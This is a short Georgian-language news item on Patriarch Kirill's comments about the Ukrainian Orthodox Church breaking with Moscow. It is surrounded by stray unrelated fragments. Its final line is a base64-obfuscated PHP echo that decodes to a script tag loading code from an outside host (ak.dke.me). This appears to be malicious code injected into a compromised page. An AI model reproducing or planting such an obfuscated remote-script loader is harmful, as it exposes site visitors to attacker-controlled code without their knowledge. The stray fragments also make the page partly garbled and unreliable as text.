celsiusi
ავერსი შნაიდერი
რუსეთის პატრიარქმა კირილმა განაცხადა, რომ მას ესმის უკრაინაში მის საპატრიარქოს დაქვემდებარებული ეკლესიის მიერ მოსკოვთან კავშირების გაწყვეტაზე მიღებული გადაწყვეტილება. ინფორმაციას სააგენტო „ფრანს-პრესი“ ავრცელებს.
 
„ჩვენ სრულად გვესმის, როგორ იტანჯება დღეს უკრაინის მართლმადიდებელი ეკლესია. ჩვენ გვესმის, რომ მისმა უნეტარესმა მიტროპოლიტმა ონუფრიმ და ეპისკოპატმა დღეს, რაც შეიძლება ბრძნულად უნდა იმოქმედონ, რათა არ გაართულონ თავიანთი მრევლის ცხოვრება“, - განაცხადა რუსეთის მართლმადიდებლური ეკლესიის მეთაურმა მოსკოვში, მაცხოვრის საკათედრო ტაძარში.
 
პატრიარქმა კირილმა დასძინა, რომ „ბოროტ სულებს“ სურდათ რუსეთისა და უკრაინის მართლმადიდებელი ხალხის გაყოფა, მაგრამ ეს არ გამოუვიდათ.
643
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");